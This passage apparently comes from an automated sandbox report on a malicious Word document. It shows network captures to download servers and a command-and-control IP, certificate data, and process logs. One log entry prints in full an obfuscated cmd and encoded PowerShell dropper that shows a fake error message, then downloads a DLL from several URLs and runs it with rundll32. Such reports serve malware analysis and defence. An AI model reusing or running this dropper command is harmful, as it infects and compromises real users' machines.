6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64
                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          1192.168.2.2249167212.227.200.7380C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Jan 25, 2021 20:12:27.375190020 CET7OUTGET /bin/JyeS/ HTTP/1.1
                                                                          Host: traumfrauen-ukraine.de
                                                                          Connection: Keep-Alive
                                                                          Jan 25, 2021 20:12:27.685669899 CET8INHTTP/1.1 301 Moved Permanently
                                                                          Server: nginx
                                                                          Date: Mon, 25 Jan 2021 19:12:18 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Content-Length: 0
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.14
                                                                          P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
                                                                          Expires: Wed, 17 Aug 2005 00:00:00 GMT
                                                                          Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                          Pragma: no-cache
                                                                          Set-Cookie: 4bf06e271745b22ffd3a18c8d5fc8b33=u4jqg2tisvnuti3u08sjaomuao; path=/; secure; HttpOnly
                                                                          X-Content-Type-Options: nosniff
                                                                          Location: https://traumfrauen-ukraine.de/bin/JyeS/
                                                                          Last-Modified: Mon, 25 Jan 2021 19:12:18 GMT
                                                                          X-Powered-By: PleskLin
                                                                          Jan 25, 2021 20:12:27.928705931 CET13INHTTP/1.1 301 Moved Permanently
                                                                          Server: nginx
                                                                          Date: Mon, 25 Jan 2021 19:12:18 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Content-Length: 0
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.14
                                                                          P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
                                                                          Expires: Wed, 17 Aug 2005 00:00:00 GMT
                                                                          Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                          Pragma: no-cache
                                                                          Set-Cookie: 4bf06e271745b22ffd3a18c8d5fc8b33=u4jqg2tisvnuti3u08sjaomuao; path=/; secure; HttpOnly
                                                                          X-Content-Type-Options: nosniff
                                                                          Location: https://traumfrauen-ukraine.de/bin/JyeS/
                                                                          Last-Modified: Mon, 25 Jan 2021 19:12:18 GMT
                                                                          X-Powered-By: PleskLin


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          2192.168.2.2249171190.55.186.22980C:\Windows\SysWOW64\rundll32.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Jan 25, 2021 20:12:59.103532076 CET735OUTPOST /pvaadnb3/ HTTP/1.1
                                                                          DNT: 0
                                                                          Referer: 190.55.186.229/pvaadnb3/
                                                                          Content-Type: multipart/form-data; boundary=------------JavqSYlmrOTC
                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                          Host: 190.55.186.229
                                                                          Content-Length: 5508
                                                                          Connection: Keep-Alive
                                                                          Cache-Control: no-cache
                                                                          Jan 25, 2021 20:13:00.443907022 CET742INHTTP/1.1 200 OK
                                                                          Server: nginx
                                                                          Date: Mon, 25 Jan 2021 19:13:00 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Vary: Accept-Encoding
                                                                          Data Raw: 63 39 34 0d 0a 42 85 d3 48 0f 3b 50 13 7a c2 46 27 8c f4 4b b3 dd 25 32 75 45 4e e9 d0 00 6d b3 4f e9 bc 60 5c aa 62 81 a8 f7 1a 99 79 68 3c 39 fa c6 54 4f 51 02 3b 47 af 9e e1 70 c0 66 47 cf eb f1 f5 9b b0 01 52 a0 aa 35 7e ea 7f d1 21 7a 27 0d b3 86 99 7c b3 a0 98 58 99 91 08 d5 3f 8e 10 a5 5c 48 19 a8 45 4b 43 88 bf 7f 4b 0e 25 cc 8d 2b 87 d7 1b 68 86 e1 f3 1c 06 ee bd d9 57 b1 24 e5 bb 26 f8 3d 97 62 cb 33 68 5d 34 c3 58 fa d1 17 b2 03 cd e9 4c 17 cb 58 4d 88 41 c5 17 15 47 26 ed 94 ad e2 ca 74 44 de 05 1e 96 af f0 83 a6 27 35 63 54 cb 36 68 74 a3 62 8a 40 27 7c 47 f2 24 1a 63 a6 0b d0 c9 18 b8 93 1c 2b 4d 4f 9d 41 f9 fa b8 88 09 39 a2 65 c2 ec ca a1 17 26 30 b3 7a 39 f6 51 a7 c9 46 1c ca cf 12 a9 38 63 66 dc ff 1d 95 bc 84 f2 09 3b 95 d8 cb c8 eb 06 ba 74 a9 dc 75 90 15 05 e7 fd b6 ce dc 89 d4 ce 7a 73 4d 89 9e b3 b6 a8 66 dd cf 7c d5 38 08 77 53 57 fc 8e dd c5 42 05 3b 8f 55 9b 61 c7 bd 9d f0 78 a8 f8 92 6b 12 62 d4 4a 05 d6 be fd ca 1c b5 2c 09 91 43 41 3a 63 5a b4 ae b5 4c d1 75 29 98 50 12 40 00 71 27 77 a1 94 9d f7 ad 7a 3c 93 db bf 5e c9 c7 5f 0a 1d 8e 95 be ef 2a 02 9a 80 c8 66 0f 03 84 f5 e2 28 8d 33 5c 78 88 71 82 c1 ac 5c 0c e8 3f 30 6e 23 e1 87 55 11 46 07 8e fc 4a 93 cd a2 92 06 b0 51 95 d1 73 68 0e 57 41 b2 bd 03 ff 61 2d cc 89 2d 96 ab a4 18 c2 a9 3f 8c 87 79 2e eb 9a 8d ea 6b 16 59 eb ba d4 44 e3 16 2e 8f df 81 0f 97 31 2e f7 e2 89 37 80 ba 68 9d 48 5b ed 7e 47 c1 09 f5 3b 26 70 9b 33 7f e6 47 08 6d 65 74 d6 81 e9 17 18 e0 58 46 e0 37 e3 c0 93 d0 04 b0 58 3c f0 b1 e6 05 06 51 1d 68 4c 48 21 45 38 4c fb ae a7 1b ae cf 35 4b f3 04 e8 af 36 01 b4 1e bc 13 7f 8f 85 b8 e9 3e af ce f4 10 29 0c a8 e3 47 1f 53 21 c9 1c 59 8a 83 3d 1b b1 c5 1d 34 bc d9 3c dc e4 d1 e4 77 42 3e 9f f8 0c e4 ab 24 68 09 fa 79 dd 2e 06 a3 a8 42 bd 02 5a a2 d3 22 26 0b ed 96 b5 5d 54 fe 0e ff 09 fd dd 6b 7c 9b 8e aa 42 3d 24 2b 9e 1c 94 ae a2 0d 69 23 16 c7 45 4e 7a 32 0a c9 55 73 c6 23 49 e1 5d fe 14 8f 5d 3f 4a 37 0f b4 7f ef db 13 72 09 32 d4 aa ce 95 6b b8 32 83 bb 46 7b a9 c7 aa d6 0e 0d 12 61 ab 3a 30 00 5c 79 dd fb 03 6c 86 b4 b1 dc ae 5a 4f 67 01 ba ba 30 70 d9 e3 1d 3a aa 9c e6 9f 49 e8 8c ca c5 3a 20 d7 de ea 93 77 da 94 91 bb 43 dc 7b f5 1a d6 90 ef a8 3d 0b 99 47 a1 99 72 98 fc d6 16 46 1d f7 bc a6 e1 68 23 d9 81 e9 3d de c6 2f 78 70 9f b5 7b 31 59 43 dc 16 c7 81 9d 4e 66 4f c4 f4 56 2f 3b f0 4c dd 3e d2 83 fb 6a f2 6b 67 ec 0f 8a da 11 d2 66 d5 a7 ec bb d8 69 83 e8 e1 97 16 8c ee 7f ea eb a2 87 48 07 d4 01 c3 bd 39 d2 f1 5f 87 67 01 9b 30 0b d5 72 86 fc 86 d5 db f7 77 fd 2c 9a d7 1e e2 a9 99 da 9e fe 72 89 1a 3e 36 cc 26 98 6c 58 62 53 84 80 80 fa 6f 20 28 3a 03 f3 09 13 c4 3f 00 eb 60 f7 e2 3d c0 93 ba ab fe 36 7c db fc 4b 5b f7 59 91 90 81 54 e3 8c 55 7e aa 17 a7 27 bb ff 88 d9 3b 21 1c f1 03 8e 1e b9 64 1b 62 e0 3f ab 59 ae b1 6d cf ea 43 f4 4d 63 bf ec b1 42 34 4c 9a 91 d7 ce f7 e5 a3 25 40 3e 11 71 26 c6 dc 53 ee f7 8b 3e 3c 88 77 71 57 a0 4f ed 5b 64 9a 91 ad 56 10 39 e4 45 f6 3b a4 12 a5 d1 54 97 f4 39 db ac b4 2a 07 54 9a 86 6f a1 97 9f d4 18 bb 64 1a 07 ba d6 94 2c 96 86 a7 f6 29 c1 21 bb eb 92 1f 2c 19 ab f8 46 c9 a9 2c b7 64 3d e1 b9 db 61 b3 9d 65 f8 16 05 cf e7 0a 0f 66 fa 94 c2 ef fd 79 75 22 ea 2a f9 af e7 e6 ae c2 9f 5f c9 23 6a c3 b3 8a 70 8b 17 80 b1 45 80 92 a3 29 5b ed a2 23 5a a6 2f a8 0c 5f 9e b9 f3 ac c8 ab ce e8 fd 87 c8 ab a7 71 ac 9c 1e cd 2c 5a ea 94 d8 b5 76 17 71 e6 e3 fc 73 4f 55 2a 19 3c 29 ab eb a3 0b b9 e7 f7 90 ee 69 12 fe 73 b9 71 d6 99 12 f5 f7 48 03 7f 20
                                                                          Data Ascii: c94BH;PzF'K%2uENmO`\byh<9TOQ;GpfGR5~!z'|X?\HEKCK%+hW$&=b3h]4XLXMAG&tD'5cT6htb@'|G$c+MOA9e&0z9QF8cf;tuzsMf|8wSWB;UaxkbJ,CA:cZLu)P@q'wz<^_*f(3\xq\?0n#UFJQshWAa--?y.kYD.1.7hH[~G;&p3GmetXF7X<QhLH!E8L5K6>)GS!Y=4<wB>$hy.BZ"&]Tk|B=$+i#ENz2Us#I]]?J7r2k2F{a:0\ylZOg0p:I: wC{=GrFh#=/xp{1YCNfOV/;L>jkgfiH9_g0rw,r>6&lXbSo (:?`=6|K[YTU~';!db?YmCMcB4L%@>q&S><wqWO[dV9E;T9*Tod,)!,F,d=aefyu"*_#jpE)[#Z/_q,ZvqsOU*<)isqH


                                                                          HTTPS Packets

                                                                          TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                          Jan 25, 2021 20:10:44.976731062 CET104.21.88.166443192.168.2.2249166CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IESat Aug 01 02:00:00 CEST 2020 Mon Jan 27 13:48:08 CET 2020Sun Aug 01 14:00:00 CEST 2021 Wed Jan 01 00:59:59 CET 2025769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,005af1f5ca1b87cc9cc9b25185115607d
                                                                          CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
                                                                          Jan 25, 2021 20:12:27.842226982 CET212.227.200.73443192.168.2.2249168CN=*.traumfrauen-ukraine.de CN=Encryption Everywhere DV TLS CA - G1, OU=www.digicert.com, O=DigiCert Inc, C=USCN=Encryption Everywhere DV TLS CA - G1, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USThu Mar 19 01:00:00 CET 2020 Mon Nov 27 13:46:10 CET 2017Tue May 18 14:00:00 CEST 2021 Sat Nov 27 13:46:10 CET 2027769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,005af1f5ca1b87cc9cc9b25185115607d
                                                                          CN=Encryption Everywhere DV TLS CA - G1, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USMon Nov 27 13:46:10 CET 2017Sat Nov 27 13:46:10 CET 2027
                                                                          Jan 25, 2021 20:12:28.435795069 CET192.0.78.20443192.168.2.2249169CN=*.wpcomstaging.com CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USCN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBTue Sep 29 02:00:00 CEST 2020 Fri Nov 02 01:00:00 CET 2018 Tue Mar 12 01:00:00 CET 2019Sun Oct 31 01:59:59 CEST 2021 Wed Jan 01 00:59:59 CET 2031 Mon Jan 01 00:59:59 CET 2029769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,005af1f5ca1b87cc9cc9b25185115607d
                                                                          CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GBCN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USFri Nov 02 01:00:00 CET 2018Wed Jan 01 00:59:59 CET 2031
                                                                          CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USCN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBTue Mar 12 01:00:00 CET 2019Mon Jan 01 00:59:59 CET 2029

                                                                          Code Manipulations

                                                                          Statistics

                                                                          Behavior

                                                                          Click to jump to process

                                                                          System Behavior

                                                                          General

                                                                          Start time:20:10:40
                                                                          Start date:25/01/2021
                                                                          Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                          Wow64 process (32bit):false
                                                                          Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                                                          Imagebase:0x13f3f0000
                                                                          File size:1424032 bytes
                                                                          MD5 hash:95C38D04597050285A18F66039EDB456
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high

                                                                          General

                                                                          Start time:20:10:41
                                                                          Start date:25/01/2021
                                                                          Path:C:\Windows\System32\cmd.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMAZQBUAC0ASQBUAEUATQAgACAAKAAnAHYAJwArACcAQQBSAGkAYQAnACsAJwBCAGwARQA6AGYAJwArACcANwBEACcAKwAnAEgAJwApACAAIAAoACAAWwBUAFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsANAB9AHsAMQB9AHsAMwB9ACIALQBGACAAJwBTAHQAZQBNAC4AaQBPACcALAAnAGMAdABvACcALAAnAHMAeQAnACwAJwByAHkAJwAsACcALgBkAGkAcgBlACcAKQApACAAIAA7ACAAcwBFAHQALQBJAHQARQBNACAAVgBhAFIAaQBBAEIATABlADoAUwBnADIAeABVACAAKAAgACAAWwBUAHkAUABlAF0AKAAiAHsANwB9AHsANAB9AHsANQB9AHsAMQB9AHsAOAB9AHsAMgB9AHsAMAB9AHsANgB9AHsAMwB9ACIALQBGACcAQQBuAEEAZwAnACwAJwBDAEUAUABvAEkAbgAnACwAJwBNACcALAAnAFIAJwAsACcAVABFAG0ALgBOAGUAdAAuAFMARQByACcALAAnAHYASQAnACwAJwBFACcALAAnAFMAWQBzACcALAAnAHQAJwApACAAIAApADsAIAAgACQAWgB6ADgAMgBfADQAMgA9ACQAQgAwADMASQAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQASwA3ADgAUwA7ACQATwAwADAARwA9ACgAJwBFAF8AJwArACcANgBaACcAKQA7ACAAIAAkAEYANwBEAEgAOgA6ACIAYwByAEUAQQBgAFQARQBEAEkAYABSAGAAZQBjAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAZwBUAEwAJwArACcAeABiACcAKwAnAGYAJwApACsAJwB5AHYAJwArACcAawAnACsAJwBlAGcAJwArACcAVAAnACsAJwBHAGMAJwArACgAJwBxAHQAJwArACcAcgBfAGYAJwApACsAKAAnAGUAZwAnACsAJwBUACcAKQApAC4AIgByAGUAUABMAGAAQQBDAEUAIgAoACgAWwBDAEgAQQBSAF0AMQAwADEAKwBbAEMASABBAFIAXQAxADAAMwArAFsAQwBIAEEAUgBdADgANAApACwAWwBzAHQAcgBpAG4AZwBdAFsAQwBIAEEAUgBdADkAMgApACkAKQA7ACQAUAA0ADYAVQA9ACgAJwBBACcAKwAoACcANgA1ACcAKwAnAFEAJwApACkAOwAgACAAJABTAEcAMgBYAFUAOgA6ACIAcwBgAEUAQwB1AGAAUgBpAFQAWQBwAHIATwBUAG8AYABjAGAATwBsACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABJAF8ANwBSAD0AKAAnAEQAJwArACgAJwA3ADUAJwArACcARwAnACkAKQA7ACQAWQB6AGoAcQB4AHgAcQAgAD0AIAAoACcAQwA0ACcAKwAnADYAVAAnACkAOwAkAEwAXwBfAFMAPQAoACgAJwBQAF8AJwArACcAXwAnACkAKwAnAEQAJwApADsAJABVAGsAMQB0AHQAMQBfAD0AJABIAE8ATQBFACsAKAAoACcASAAnACsAKAAnAE8AeAAnACsAJwBMAHgAYgBmACcAKQArACcAeQAnACsAJwB2ACcAKwAoACcAawBIAE8AeAAnACsAJwBHAGMAcQAnACkAKwAnAHQAJwArACgAJwByAF8AZgAnACsAJwBIAE8AeAAnACkAKQAuACIAcgBFAHAAbABgAEEAYwBlACIAKAAoACcASABPACcAKwAnAHgAJwApACwAWwBzAHQAUgBJAE4AZwBdAFsAQwBIAGEAUgBdADkAMgApACkAKwAkAFkAegBqAHEAeAB4AHEAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFQANQA1AEwAPQAoACgAJwBZACcAKwAnADIAMQAnACkAKwAnAFEAJwApADsAJABKAGcANAAxAHMAYwB3AD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQATgBpAG8AbwBpADIAcQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgACcAKQArACgAJwBkACcAKwAnAGIAIAAnACkAKwAoACcAbgBkACcAKwAnADoAJwApACsAKAAnAC8ALwAnACsAJwBuAGkAJwApACsAJwBnAGgAJwArACgAJwB0ACcAKwAnAGwAaQBmAGUAbQB1ACcAKwAnAG0AYgAnACkAKwAnAGEAJwArACgAJwBpAC4AJwArACcAYwBsACcAKQArACgAJwB1AGIALwB4ACcAKwAnAC8AMAB3ACcAKwAnAEIAJwApACsAKAAnAEQAMwAnACsAJwAvACEAbgAnACsAJwBzACAAdwAnACkAKwAnAHUAIAAnACsAJwBkACcAKwAnAGIAJwArACgAJwAgAG4AZAAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwAnACsAJwBzAGgAbwAnACkAKwAoACcAcAAuAG4AbwAnACsAJwB3ACcAKQArACcAZgAnACsAKAAnAGEAbAAuAGQAJwArACcAZQAnACkAKwAnAHYAJwArACcALwB3ACcAKwAoACcAcAAtAGkAbgAnACsAJwBjACcAKQArACgAJwBsAHUAJwArACcAZABlACcAKQArACgAJwBzAC8AUgAnACsAJwBsAE0ATwAnACsAJwBiAGYAJwApACsAKAAnADIAagAwACcAKwAnAC8AIQBuAHMAIAB3ACcAKwAnAHUAJwApACsAKAAnACAAJwArACcAZABiACAAJwArACcAbgBkADoALwAnACkAKwAnAC8AJwArACgAJwBlAC0AJwArACcAdwAnACsAJwBkAGUAcwBpAGcAbgAnACkAKwAnAC4AJwArACgAJwBlACcAKwAnAHUALwB3AHAAJwApACsAJwAtACcAKwAnAGMAJwArACgAJwBvACcAKwAnAG4AdABlACcAKQArACgAJwBuAHQAJwArACcALwAnACsAJwBiAG4AMQBJAGcAJwArACcARAAnACsAJwBlAGoAaAAvACEAbgBzACAAJwApACsAKAAnAHcAdQAnACsAJwAgAGQAJwArACcAYgAgAG4AZAAnACkAKwAnADoALwAnACsAJwAvACcAKwAnAHQAJwArACgAJwByAGEAJwArACcAdQBtAGYAJwApACsAJwByACcAKwAnAGEAJwArACgAJwB1AGUAJwArACcAbgAnACkAKwAoACcALQB1AGsAJwArACcAcgAnACkAKwAoACcAYQBpACcAKwAnAG4AZQAnACsAJwAuAGQAZQAnACkAKwAnAC8AYgAnACsAKAAnAGkAbgAnACsAJwAvAEoAeQBlACcAKQArACgAJwBTAC8AIQAnACsAJwBuAHMAIAB3AHUAIAAnACkAKwAoACcAZAAnACsAJwBiACAAJwApACsAKAAnAG4AJwArACcAZABzADoAJwApACsAKAAnAC8ALwAnACsAJwBqAGYAbABtACcAKQArACgAJwBrAHQAJwArACcAZwAuAHcAcABjACcAKQArACcAbwBtACcAKwAoACcAcwB0AGEAJwArACcAZwBpACcAKwAnAG4AZwAuACcAKwAnAGMAJwArACcAbwBtAC8AdwBwACcAKwAnAC0AYwBvAG4AdABlAG4AdAAnACkAKwAoACcALwBBAEsAJwArACcALwAnACkAKwAoACcAIQBuAHMAJwArACcAIAB3AHUAIAAnACkAKwAoACcAZABiACAAJwArACcAbgBkACcAKQArACgAJwBzADoAJwArACcALwAvAGwAaQBuACcAKQArACcAaABrACcAKwAoACcAaQAnACsAJwBlAG4AJwApACsAJwBtACcAKwAoACcAYQAnACsAJwB5AHQAaQAnACsAJwBuAGgALgB0ACcAKQArACcAYwAnACsAJwB0AGUAJwArACgAJwBkAHUALgBjAG8AJwArACcAbQAnACsAJwAvAHcAcAAtACcAKwAnAHMAbgAnACkAKwAnAGEAJwArACgAJwBwAHMAJwArACcAaABvACcAKwAnAHQAcwAvAFYAJwApACsAJwB6ACcAKwAnAEoATQAnACsAJwAvACcAKQAuACIAcgBlAFAAYABMAEEAYwBlACIAKAAoACgAJwBuAHMAJwArACcAIAB3ACcAKQArACcAdQAnACsAKAAnACAAZABiACAAbgAnACsAJwBkACcAKQApACwAKABbAGEAcgByAGEAeQBdACgAJwBuAGoAJwAsACcAdAByACcAKQAsACcAeQBqACcALAAnAHMAYwAnACwAJABKAGcANAAxAHMAYwB3ACwAJwB3AGQAJwApAFsAMwBdACkALgAiAHMAUABsAGAAaQBUACIAKAAkAE8AMwAyAE8AIAArACAAJABaAHoAOAAyAF8ANAAyACAAKwAgACQATwA3ADQAWQApADsAJABIADAAOABUAD0AKAAoACcAQgA2ACcAKwAnADgAJwApACsAJwBKACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAVwByAGEAdgB0AGkAZQAgAGkAbgAgACQATgBpAG8AbwBpADIAcQApAHsAdAByAHkAewAoACYAKAAnAE4AZQB3AC0AJwArACcATwAnACsAJwBiAGoAZQAnACsAJwBjAHQAJwApACAAcwBZAHMAVABlAG0ALgBOAEUAdAAuAFcAZQBiAEMAbABpAEUATgB0ACkALgAiAEQATwBXAGAATgBsAGAATwBhAGQAZgBgAEkATABlACIAKAAkAFcAcgBhAHYAdABpAGUALAAgACQAVQBrADEAdAB0ADEAXwApADsAJABLAF8ANQBCAD0AKAAnAFQAMgAnACsAJwBfAFYAJwApADsASQBmACAAKAAoAC4AKAAnAEcAZQB0ACcAKwAnAC0ASQB0AGUAbQAnACkAIAAkAFUAawAxAHQAdAAxAF8AKQAuACIAbABlAGAATgBnAHQAaAAiACAALQBnAGUAIAAzADEAOAAxADQAKQAgAHsAJgAoACcAcgB1AG4AZABsAGwAMwAnACsAJwAyACcAKQAgACQAVQBrADEAdAB0ADEAXwAsACgAKAAnAEEAbgAnACsAJwB5AFMAdAAnACkAKwAoACcAcgAnACsAJwBpAG4AJwApACsAJwBnACcAKQAuACIAdABvAFMAVAByAGkAYABOAEcAIgAoACkAOwAkAEcAMAAzAEwAPQAoACcAVQA1ACcAKwAnADYAUwAnACkAOwBiAHIAZQBhAGsAOwAkAFIAMQAzAEoAPQAoACcAUgA4ACcAKwAnAF8ASgAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEoAOAAyAEUAPQAoACcAVwAnACsAKAAnADIAOAAnACsAJwBMACcAKQApAA==
                                                                          Imagebase:0x49ed0000
                                                                          File size:345088 bytes
                                                                          MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:moderate

                                                                          General

                                                                          Start time:20:10:42
                                                                          Start date:25/01/2021
                                                                          Path:C:\Windows\System32\msg.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:msg user /v Word experienced an error trying to open the file.
                                                                          Imagebase:0xffd10000
                                                                          File size:26112 bytes
                                                                          MD5 hash:2214979661E779C3E3C33D4F14E6F3AC
